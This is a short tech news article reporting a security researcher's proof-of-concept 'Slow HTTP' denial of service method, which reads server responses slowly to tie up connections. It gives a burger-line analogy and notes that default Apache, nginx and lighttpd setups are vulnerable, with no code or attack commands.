clock menu more-arrow no yes

Filed under:

New Denial of Service vulnerability detailed, doesn't require many PCs

New, 12 comments

A new method for a denial of service attack against a web server has been developed which doesn't require thousands of computers in order to take a server or website down.

Denial of Service code 630
Denial of Service code 630

You have probably heard of Distributed Denial of Service attacks, where a massive number of computers are used (and often hijacked) in order to barrage a website with requests and effectively shut it down. What you may not know is that there are denial of service (DoS) methods that don't need to be so distributed. So says security researcher Sergey Shekyan, who has developed a proof of concept that is a "Slow HTTP DoS." The "slow" method essentially makes an HTTP request to a server but does so in a way that can cause the server to hang. As Ars Technica explains, what the attacking computer does it read incoming information very slowly, which forces the target server to keep its connection open and hogs up resources. This method means that thousands of PCs may not be needed in order to execute a DoS attack. Sheykan describes it with our favorite kind of analogy, the kind involving burgers:

Imagine a line at a fast food restaurant that serves two types of burgers, and a customer at the cashier is stuck for a while deciding what he wants to order, making the rest of the line anxious, slowing down the business. Now imagine a line at the same restaurant, but with a sign saying "think ahead of your order," which is supposed to speed things up. But now the customer orders hundreds of burgers, pays, and the line is stuck again, because he can take only 5 burgers at time to his car, making signs ineffective

The bad news, Sheykan says, is that the default configurations for popular webserver software like Apache,, nginx, and lighttpd are all vulnerable. However, there are steps that server administrators can take to minimize exposure and it's just a proof of concept right now, not an in-the-wild attack.